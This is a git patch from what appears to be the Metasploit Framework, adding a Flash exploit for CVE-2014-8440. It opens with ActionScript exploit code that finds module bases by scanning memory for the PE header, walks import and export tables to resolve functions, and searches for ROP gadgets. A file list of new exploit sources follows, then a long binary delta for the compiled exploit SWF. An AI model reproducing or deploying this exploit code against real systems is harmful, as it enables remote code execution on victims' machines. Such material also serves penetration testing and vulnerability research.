-			addr &= 0xffff0000
-			while (true) {
-				if (byte_read(addr) == 0x00905a4d) return addr
-				addr -= 0x10000
-			}
-			return 0
-		}
-
-		private function module(name:String, addr:uint):uint
-		{
-			var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80) 
-			var i:int = -1
-			while (true) {
-				var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
-				if (!entry) throw new Error("FAIL!");
-				ba.position = addr + entry
-				var dll_name:String = ba.readUTFBytes(name.length).toUpperCase();
-				if (dll_name == name.toUpperCase()) {
-					break;
-				}
-			}
-			return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)));
-		}
-
-		private function procedure(name:String, addr:uint):uint
-		{
-			var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
-			var numberOfNames:uint = byte_read(eat + 0x18)
-			var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
-			var addressOfNames:uint = addr + byte_read(eat + 0x20)
-			var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
-
-			for (var i:uint = 0; ; i++) {
-				var entry:uint = byte_read(addressOfNames + i * 4)
-				ba.position = addr + entry
-				if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
-			}
-			return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
-		}
-
-		private function gadget(gadget:String, hint:uint, addr:uint):uint
-		{
-			var find:uint = 0
-			var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
-			var value:uint = parseInt(gadget, 16)
-			for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
-			return addr + i
-		}		
-	}
-}

From cf8c6b510b1c80c18186be685df2f9b4feafb0ff Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 9 Jun 2015 15:46:21 -0500
Subject: [PATCH 0369/1013] Debug version working

---
 data/exploits/CVE-2014-8440/msf.swf           | Bin 18612 -> 21802 bytes
 external/source/exploits/CVE-2014-8440/Elf.as | 235 ++++++++++
 .../source/exploits/CVE-2014-8440/Exploit.as  | 421 ++++++++++++++++++
 .../CVE-2014-8440/ExploitByteArray.as         |  85 ++++
 .../exploits/CVE-2014-8440/ExploitVector.as   |  74 +++
 .../exploits/CVE-2014-8440/Exploiter.as       | 403 +++++++++++++++++
 .../source/exploits/CVE-2014-8440/Logger.as   |  32 ++
 external/source/exploits/CVE-2014-8440/PE.as  |  72 +++
 ...obe_flash_uncompress_zlib_uninitialized.rb |  19 +-
 9 files changed, 1333 insertions(+), 8 deletions(-)
 create mode 100755 external/source/exploits/CVE-2014-8440/Elf.as
 create mode 100755 external/source/exploits/CVE-2014-8440/Exploit.as
 create mode 100755 external/source/exploits/CVE-2014-8440/ExploitByteArray.as
 create mode 100755 external/source/exploits/CVE-2014-8440/ExploitVector.as
 create mode 100755 external/source/exploits/CVE-2014-8440/Exploiter.as
 create mode 100755 external/source/exploits/CVE-2014-8440/Logger.as
 create mode 100755 external/source/exploits/CVE-2014-8440/PE.as

diff --git a/data/exploits/CVE-2014-8440/msf.swf b/data/exploits/CVE-2014-8440/msf.swf
index c6e47d226d51239e078fece012f402ad019ec62f..a677624095bb658d2f57c442ae2f83125c20c94a 100755
GIT binary patch
delta 21691
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
